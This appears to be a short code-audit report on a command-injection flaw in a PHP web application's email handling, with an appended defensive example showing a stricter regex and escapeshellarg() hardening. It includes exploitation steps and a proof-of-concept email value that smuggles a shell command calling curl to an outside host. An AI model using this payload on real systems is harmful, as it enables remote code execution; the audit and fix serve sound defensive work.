List of vulnerable paths
Vulnerable path: /application/controllers/api/user.php
Vulnerable path: /application/libraries/service/Network/Request.php
The process of code audit
The $email value comes from Request::parse().
Lines 44-56 of "Request.php" show us that we can input any data.
Lines 294-295 of "user.php" use a vulnerable regular expression: because there is no backslash in front of the dot, the dot can match anything.
Then the email is passed into EmailSender::send().
Let us check the function.
We can exploit the "exec" function to achieve remote code execution.
Vulnerability exploitation process:
Register and log in.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xx
Your exp should be on test.server.com. We can execute any remote command.
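
An added illustration of the weakness described above and one way to close it; this is not code from the audited project. The regular expressions, the send_mail.php worker name and the command shape are assumptions, because the audited lines are not reproduced in the report.

```php
<?php
// Added example: NOT the audited project's code. The regexes, the
// send_mail.php worker name and the command shape are assumptions.
// Nothing is executed; the script only builds and prints strings.

// Weak check (assumed shape): unescaped dot, no anchors, so a string that
// merely contains something address-like is accepted.
function weak_is_email(string $s): bool {
    return preg_match('/[\w-]+@[\w-]+.[\w-]+/', $s) === 1;
}

// Stricter check: dots escaped, \A...\z anchors so nothing may precede or
// follow the address, and a conservative character set.
function strict_is_email(string $s): bool {
    $re = '/\A[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/';
    return preg_match($re, $s) === 1;
}

// Naive command string (assumed shape): the value is pasted between quotes,
// so a quote inside the value ends the argument early.
function naive_command(string $email): string {
    return "php send_mail.php '" . $email . "'";
}

// Hardened: validate first, then escapeshellarg() so the shell sees the
// value as exactly one argument whatever characters it contains.
function safe_command(string $email): string {
    if (!strict_is_email($email)) {
        throw new InvalidArgumentException('invalid email address');
    }
    return 'php send_mail.php ' . escapeshellarg($email);
}

// Inputs: the POC string from the report, and a constructed valid address.
$samples = ["youyou@qq.com'xx|curl test.server.com;xx'xx", 'youyou@qq.com'];

foreach ($samples as $s) {
    printf("input : %s\n", $s);
    printf("weak  : %s\n", weak_is_email($s) ? 'accepted' : 'rejected');
    printf("strict: %s\n", strict_is_email($s) ? 'accepted' : 'rejected');
    printf("naive : %s\n", naive_command($s));
    try {
        printf("safe  : %s\n\n", safe_command($s));
    } catch (InvalidArgumentException $e) {
        printf("safe  : refused (%s)\n\n", $e->getMessage());
    }
}
```

Where the mail job can be started without a shell (for example proc_open() with an array command on PHP 7.4 and later), the quoting problem does not arise at all.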